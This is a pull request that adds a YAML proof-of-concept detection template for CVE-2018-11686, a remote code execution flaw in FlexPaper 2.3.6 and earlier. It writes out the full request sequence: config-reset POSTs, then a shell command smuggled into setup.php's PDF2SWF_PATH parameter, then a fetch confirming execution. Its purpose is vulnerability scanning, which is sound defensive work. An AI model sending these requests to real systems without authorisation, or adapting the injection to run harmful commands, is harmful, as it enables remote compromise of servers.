### PR TITLE
Add poc for CVE 2018 11686

### DIFF
--- a/pocs/flexpaper-cve-2018-11686.yml
+++ b/pocs/flexpaper-cve-2018-11686.yml
@@ -1,0 +1,38 @@
+name: poc-yaml-flexpaper-cve-2018-11686
+set:
+  r1: randomInt(5, 10)
+  r2: randomLowercase(r1)
+rules:
+  - method: POST
+    path: /php/change_config.php
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
+    expression: |
+      response.status == 302 || response.status == 200
+  - method: POST
+    path: /php/change_config.php
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
+    expression: |
+      response.status == 302 || response.status == 200
+  - method: GET
+    path: >-
+      /php/setup.php?step=2&PDF2SWF_PATH=echo {{r2}} > {{r2}}
+    follow_redirects: false
+    expression: |
+      response.status == 200
+  - method: GET
+    path: >-
+      /php/{{r2}}pdf2swf
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r2)))
+detail:
+  author: Soveless(https://github.com/Soveless)
+  Affected Version: "FlexPaper <= 2.3.6"
+  links:
+    - https://github.com/mpgn/CVE-2018-11686
+    - https://cloud.tencent.com/developer/article/1472550


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
CVE 2018 11686
FlexPaper <= 2.3.6 中存在RCE
## 测试环境
https://send.firefox.com/download/ddce6f36a6e79d23/#kFBNsttuuY-0xKfKS9r8sw
## 备注
![cve-2018-11686](https://user-images.githubusercontent.com/60567763/82112885-33084780-9706-11ea-9f1f-4ad5cd149fa6.JPG)
